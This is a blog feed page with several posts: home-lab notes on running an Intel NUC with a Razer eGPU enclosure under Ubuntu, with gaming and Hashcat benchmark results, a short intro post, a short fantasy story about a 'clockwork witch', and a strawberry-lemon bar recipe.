Just as I started in on this project, I was also listening to the [Linux Downtime](https://linuxdowntime.com podcast, and as luck would have it, they had an episode with Liam, the author of the Gaming on Linux website, They introduced me to Proton, a Steam project to bring mainstream games to #Linux, requiring just a right-click setting to enable on Linux what would otherwise be a Windows-only game. This opened up a realm of possibilities, and also delayed the testing as I played through thoroughly tested the capabilities of the NUC + eGPU combination.

Running games under Ubuntu with the eGPU connected seemed to work well. The window on the enclosure is nice, as you can visibly see when the system offloads to the GPU

Intel NUC with Razer Core X Chroma

Deployment

Before and After

GTX 10660 and RTX 3090

Considerations

With the newest GPUs, space is a consideration. Some of the most powerful are three PCIe slots wide, and the Chroma enclosure only handles 2 slots (officially). That was one of the drivers for a 3090, though I have seen people doing a bit of machining in order to fit the three slot into the rather large enclosure.

Benchmarking

I didn’t take down

Hashcat

Intel NUC i5 + GTX 1060: – example0: 733.3 MH/s, 55s – example400: 2741.0 kH/s – example500: 63348 H/s

Intel NUC i5 + RTX 3090 – example0: 10460.7 MH/s – example400: 10491.0 kH/s – example500: 73839 H/s

Portal 2

Portal 2 runs natively under Linux, so this was an easy test

Intel NUC i5 – no GPU – choppy – barely playable

Intel NUC i5 + GTX 1060: – smooth – playable

Guardians of the Galaxy game

Intel NUC i5 – no GPU – choppy – barely playable

Intel NUC i5 + GTX 1060: – lower framerate while big action is taking place – mostly playable

Intel NUC i5 + RTX 3090 – smooth and with higher settings than the GTX10060 – playable, but CPU runs between 65-85% during gameplay, so an upgrade here would help

Before and After

One of the primary objectives was to lower both the size and power footprint while upgrading the overall capacity and computing experience. As the next couple of pictures show, the first objective was achieved. The second objective remains a bit more elusive. When the system works, it works, but I am still trying to figure out what causes me to land in a reboot cycle where I need to power on and then reboot 2-3 times before the OS fully recognizes the GPU and peripherals connected to the USB hub.

A plain black tower PC.  Red glowing fans in front. Image: Full tower on top of network stack

And here comes the i7 NUC on top of the eGPU enclosure. NUCs are a study in economy of space, but the following picture really showcases how a full-fledged, highly-performant computer is still about 1/30 the size of the one it replaced (ignoring the GPU, of course).

Intel NUC on top of Razer Core X Chroma eGPU Image: Just the enclosure with a NUC on top.

Moving to the enclosure with the NUC as primary compute, pictured above, Weird that the camera picks up so much debris on the top of the enclosure; it’s actually very new and there is very little dust on top.

Thoughts

While the vertical space savings are significant, I’d say that if space economy is your primary objective, the eGPU only aids in vertical space savings; the enclosure has about the same 2D footprint as my former tower. But, if you count the space (& weight!!) savings in the laptop, it becomes significant. I can comfortably travel with a light, sub-3 lb. (<1.5 kg) laptop in my backpack for hours on end. This is important for conferences like DEFCON or FIRST where you are going to be away from the hotel pretty much all day and want the laptop with you, even though it will be unused in the backpack for much of the time.

After this fairly expensive experiment (which I’m stuck with for a few years), I’m not sure if I’d do it again. There are definitely benefits as I’ve outlined above, and it has mostly met my expectations. The NUC is due for an upgrade in a year, and it’s difficult for me to imagine needing much more in the way of GPU for a while[^1] so I think that will make upgrades easier to navigate. It’s much simpler to look at the small form-factor PCs available and choose from that rather than evaluating all the available parts from a myriad of vendors and navigating their (in)compatibilities.

What it really comes down to is the plug-and-playability. If I could treat this thing like a docking station with a massive GPU, I would be all-in. As it stands, the setup is more of a trial-and-error PnP system where I’m never sure what I’m going to get out of it. To that end, lack of hot plug support is unfortunate. I’d really like to be able to move the eGPU from the NUC to a laptop without needing to shutdown the system.

Since Ubuntu 22.04 and especially 23.04 worked much better than 20.04, I am hopeful for improvements in the ease-of-use.

At a minimum, I would wait for a Thunderbolt 4-capable GPU enclosure. When I started this project, all of the proven enclosures were Thunderbolt 3, manufacturers don’t release these things very often, and I was pretty impatient to give my theory a try. (Also, I’d promised an old, yet capable, system to a friend’s son. I wasn’t about to go back on that deal!). If you try something similar let me know!

[^1]: Unless I decide to go really nuts on traininig language models and other tasks and need to start using some of the Nvidia Tesla gear in my system.

 
Read more...

from Threatc.at

Trying stuff.

As in, both definitions?

I will attempt to post stuff here that will likely be a redundant copy of something I posted elsewhere. And also in the sense that navigating and using online spaces today is annoying, difficult, strains one's patience. Who knows what any particular platform is going to be like in x months or years. Better to have some other space to collect that stuff.

Anyway. As Austrians say, schau ma mal (“we'll see”).

 
Read more...

from JR DePriest

aka The Clockwork Witch

I heard the man across the restaurant, excitedly telling his server about his “vision quest”.

I reached into his mind and watched the finale before he spoke it: stripped nearly naked, hooks pulling his skin on both sides of his torso, darkness, firelight, drums, and a heavy dose of ayahuasca.

He said his vision brought him here, to our little out-of-the-way hamlet, by the shallow lake, by the thick woods, between the mountains.

And I saw his vision: the surging water, the sudden collapse, the sky lit by fiery aurorae.

He had seen something he should not have seen.

I twisted his vision, brought it from the past to the present, parked it in place, amplified it with my own magick.

His head went back, eyes wide, mouth slack open and keening like a dying animal.

I turned back to my companion, the witch. She had a name, but I called her “the witch”.

“Someone call 911,” she said.

The police and paramedics gently took him away, for observation, for his own safety.

Most everyone there was part of the plan. Most everyone there knew what had really happened and breathed a sigh of relief.

Others just shook their heads, feeling sorry for a man who had some sort of nervous breakdown at a crowded restaurant.

I took the witch's hand and said we needed to talk to her father.

This man's vision was not part of our plan and what it showed was troubling, too troubling to talk about in mixed company.

She was unconcerned. She didn't see what I saw.

As we exited into the street, into the cool night, into the moist air, we talked about what we'd accomplished in three generations.

We'd made this town prosperous. We made it comfortable.

We were in brochures and discussed on message boards and social media.

“a haunted little town”

“a beautiful, if quirky, gem”

“strange tidings, lovely people”

This place was alive and we bled off the excess slowly, for our own benefit, for the benefit of everyone who called this place home.

What he had seen was like a tidal wave, like the water, once sucked out to sea, suddenly pouring back in, overwhelming everything.

I was old enough to know what this meant but I said nothing of my fears to the witch.

Fear? Was it fear?

Or was it a sense of the inevitable. Of knowing this day would come.

Was it relief?

Could the emotions of a thing like me be described in such simple terms?

The witch smiled, and intertwined our arms.

It was a cold night and I could see her breath.

The parking lot of her father's office, the only office building in town, was empty.

A witch like him didn't need to drive.

There was no warning.

The parking lot exploded in front of us as a house made of metal and wire seemed to dig its way up through molten asphalt and churning earth.

I recognized it at once; “the clockwork witch,” I said out loud.

The witch at my side did not understand.

To her “the clockwork witch” was an urban legend.

A tale to terrify young witches into behaving.

“The clockwork witch” had been the creator of this place, had filled it with potential, with purpose.

She'd created a nexus (a nadir, really), a place where all magic must flow and would feed and feed until she had the power to rule everything, everyone.

But she was betrayed and locked away by her students, by her lessers.

How had they found the words to bind her?

How had they discovered the symbols needed?

How had they devised such clever wards without help?

I knew what happened, because I was there.

Yes, of course I knew.

She was trapped outside of time, outside of space.

A pocket reality where she could play god or goddess, do whatever she wished, create, destroy, anything.

But away from here, away from us.

We steeped in the magick, siphoned a little off the top, before releasing it back into the world.

What flows here, we use simply, for our own benefit, for the benefit of the town.

We share. We cooperate. We thrive.

For generations.

Now, here she was, the clockwork witch reborn.

She could not be as strong as she once was, the power was no longer here and breaking free could not have been easy.

But some magick requires only the correct way of thinking and reality will bend all on its own.

And the witch beside me disappeared, vanished.

I believed her father had probably done the same.

Not by choice.

No, the clockwork witch had them.

She looked so human as she stood before me, an old woman in one view, a towering fiend from another angle. I saw both simultaneously.

She knew me, remembered me.

It had been hundreds of years for me, for her, who knows? An hour, a weekend, a millennium?

I was standing before her.

I did not move nor was I moved, I was simply in front of her now whereas previously I had not been.

I bowed before her. As was my position.

The position she had appointed.

“Watcher,” she said.

“Master,” said I.

“Am I?” she said.

I said nothing.

“Watcher, tell me what has happened.”

She did not mean with words but with my mind I exposed all the centuries of memories, of meetings, decisions, of births, deaths, agreements made and broken, waters risen and fallen, the shift from the forest to the edge, from hiding to inviting, to deceit and capitalism.

I showed her almost everything.

I felt her disappointment.

I was supposed to shepherd them, not become their servant.

She raised a phial of liquid to her lips and drank.

I knew these phials and felt this was the remains of the father of the witch who had been my companion.

“Mary” had been her name. I felt shame in using it now.

At one angle the clockwork witch great taller, broader, in another, she grew younger.

She lifted another phial and spoke to it: “what is it you want?” she asked.

And Mary's voice said, “I've only ever wanted  a small coven of my own.”

We both felt the truth in this. Mary had been part of the great work because it was her birthright, but her heart was never in it, not like her father.

The clockwork witch felt no anger or hatred from her.

“Then have it,” she said, tossing the phial back into the pocket dimension in which she had been trapped.

I wished Mary well.

“Watcher,” she said to me.

I felt the sting of her eyes, the depth of her gaze.

She reached into me, deeply, deeper than I'd even allow myself to venture.

“You betrayed me,” she said.

There was no emotion to her words. I could feel her words and there was no emotion.

It was only a statement of fact.

I did not remember betraying her, but I felt the truth in it.

It was me. I taught them to capture her.

Then I made myself forget.

I felt my body slip away, forget itself completely, become liquid, become smoke, slithering into the ground, but I was caught, and stoppered.

And she drank me.

I felt myself break apart, each bit struggling to remember a single fact, a single bit of information.

That was all I was, information.

That was my purpose.

And I felt each fragment lose its grip until even my own name was a mystery.

I was nothing but her blood, her life.

I was gone.


#WhenIDream #Dreams #Dreaming #Dreamlands #Writer #Writing #Writers #AmWriting #WritingCommunity #ShortFiction #Fiction #Paranormal #Witch #Magick


This work is licensed under the Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/2.5/ or send a letter to Creative Commons,543 Howard Street, 5th Floor, San Francisco, California, 94105, USA.

 
Read more...

from Lee Rayl's Big Ideas

Cooking spray – 1 cup (8 oz.) unsalted butter, softened, cut into cubes – 1½ cups granulated sugar, divided – ¼ tsp. kosher salt – 2½ cups (about 10⅝ oz.) unbleached all-purpose flour, divided – 5 large eggs, at room temperature – 1 Tbsp. grated lemon zest plus 1 cup fresh juice (from 4 lemons) – 3 cups thinly sliced fresh strawberries – Powdered sugar, for serving

  1. Preheat oven to 350°. Line bottom and sides of a 13x9-inch baking pan with parchment paper, leaving a 2-inch overhang over long sides of baking pan. Coat with cooking spray; set aside.

  2. Beat butter and ½ cup of the granulated sugar in bowl of a stand mixer fitted with a paddle attachment on high speed until light and fluffy, 2 to 3 minutes, stopping to scrape down sides of bowl as needed. Whisk together salt and 2 cups of the flour in a medium bowl until combined. With mixer running on low speed, slowly add flour mixture to butter mixture, mixing until just combined, about 30 seconds, stopping to scrape down sides of bowl as needed. Increase speed to high, and beat until dough holds together, about 1 minute. Transfer dough to baking pan; press into an even layer. Bake in oven until edges are just beginning to brown, 18 to 20 minutes.

  3. Meanwhile, whisk together eggs and remaining 1 cup granulated sugar until combined. Whisk in lemon zest, lemon juice and remaining ½ cup flour until no clumps remain. Let mixture stand, uncovered, at room temperature until foam appears on top, 2 to 3 minutes; skim off and discard foam.

  4. Remove pan from oven. Pour lemon mixture evenly over hot crust; arrange strawberry slices evenly over top. Return pan to oven, and bake at 350° until filling is just set in center but still a little jiggly, 20 to 25 minutes. Let cool in pan on a wire rack, about 30 minutes. Refrigerate, uncovered, until fully chilled, about 45 minutes. Remove from pan using parchment paper overhang as handles. Cut into 12 bars, and dust with powdered sugar.

Serves: 12 Active time: 35 minutes Total time: 2 hours, 30 minutes

#cooking #strawberries #lemons #recipes

 
Read more...

from Kevin Neely's Security Notes

This is a log of experiences and experimentation in moving from more traditional home computing –ATX cases, components, water cooling, and continual upgrades– to something a bit more modular in terms or GPU computing power. This guide probably isn’t for most people. It’s a collection of notes I took during the process, strung together in case they might help someone also looking to pack multiple power-use-cases into as small a format as possible.

[Note:] A later evolution should involve a similar down-sizing of a home storage appliance.

Objectives

An external GPU requires more setup, and -let’s face it- fiddling than getting a gaming laptop or a full PC case that can handle multi-PCIe slot GPUs. So why do it? A couple objectives had been bouncing around in my head that led me to this: – I need a system that can run compute-intensive and GPU-intensive tasks for long periods of time, e.g. machine learning, and training large language models – I need a light laptop for travel (i.e. I don’t want to carry around a 5+lb./2.5 kilo gaming laptop) – I want to be able to play recent games, but don’t need to be on the cutting edge of gaming – I want to reduce the overall space footprint for my computing devices.

In summary, I want my systems to be able to handle the more intensive tasks I plan to throw at them: Windows laptop for gaming and also travel, the stay–at-home system can perform long-running tasks such as AI model training, password cracking, and daily cron jobs.

Things I don’t care about: – being able to play games while traveling – document data diverging due to on multiple systems: I use a personal #NextCloud instance to keep my documents in sync.

Current State

I have a number of personal computing devices in my home lab for testing things and running different tasks, but they’re all aging a bit, so it is time to upgrade: – my Razer Blade 13 laptop is from 2016 – my main tower/gaming PC is from 2015 with an Nvidia GTX 1060 – an i5 NUC from 2020 (unused) – an i3 NUC from 2013 (unused) – A 6TB NAS with 4 aging 2TB drives from 2014 – Raspberry Pis and some other non-relevant computing devices

Configurations

With the objectives in mind, and realizing that my workload system would almost certainly run Linux, the two configurations for experimentation were: – Intel NUC with an eGPU – Lightweight laptopi (e.g. Dell XPS 13) with an eGPU

[Note:] The computing systems must support at least Thunderbolt3, though version 4 would be best for future-proofing.

Shows an Nvidia GTX 1060 in a Razer Core X Chroma eGPU enclosure Image: Original GTX 1060 GPU slotted in the Razer Core X Chroma enclosure

Background Research

Before starting on this endeavor, I did a lot of research to see how likely I’d be able to succeed. The two best sources I found was the eGPU.io site with many reviews and descriptions of how well specific configurations worked (or didn’t). They also have nice “best laptop for eGPU” and Best eGPU Enclosures matrices.

Nvidia drivers and Ubuntu

Installing Nvidia drivers under #Ubuntu is pretty straightforward these days, with a one-click install option built-in to the operating system itself. The user can choose between versions, and my research showed that most applications required either version 525 or 530. I installed 530.

eGPU information

The best two sources I found for information on configuring and using eGPUs were: – r/eGPU on reddit – their “so you’re thinking about an eGPU” guideegpu.io

Proof-of-concept

Having read a fair amount about the flakiness of certain #eGPU setups, I approached this project with a bit of caution. My older tower had a respectable, if aging, GTX 1060 6GB in it. Since I already had a recent Core i5 Intel NUC running Ubuntu and some test machine learning applications, so all I needed to fully test this was the enclosure. Researching the various enclosure options, I chose this one because: – the Razer Core X series appears to have some of the best out-of-the-box compatibility – I’ve been impressed with my aging Razer laptop, so I know they build quality components – The Chroma version has what is basically an USB hub in the back with 4 USB 3.x ports and an ethernet jack added to the plain Core X version My thinking was that this system could not only provide GPU, but also act as an easy dock-hub for my primary computers. This didn’t work out quite as I planned (more in the next post).

The included thunderbolt cable is connected from the NUC to the eGPU. Theoretically, the standard peripherals (keyboard, mouse, etc.) should be connected to the eGPU hub and everything will “just work”. However, in my testing, things worked best with the peripheral hub I use plugged into the NUC and only the #Thunderbolt cable plugged into the enclosure. In the spirit of IT troubleshooters everywhere: start by making the least amount of change and iterate from there.

Intel NUC on top of Razer Core X Chroma eGPU Image: Just the enclosure with a NUC on top.

Experience

The NUC was on Ubuntu 20.04. The drivers installed just fine, but the system just wouldn’t see the GPU. Doing some research, it looked like people were having better results with more recent versions of Ubuntu, so I did a quick sudo apt dist-upgrade and upgraded the system to 22.XX. The GPU worked! However, the advice I’d been given was to upgrade to 23.04, so I did that and still the system worked fine.

 
Read more...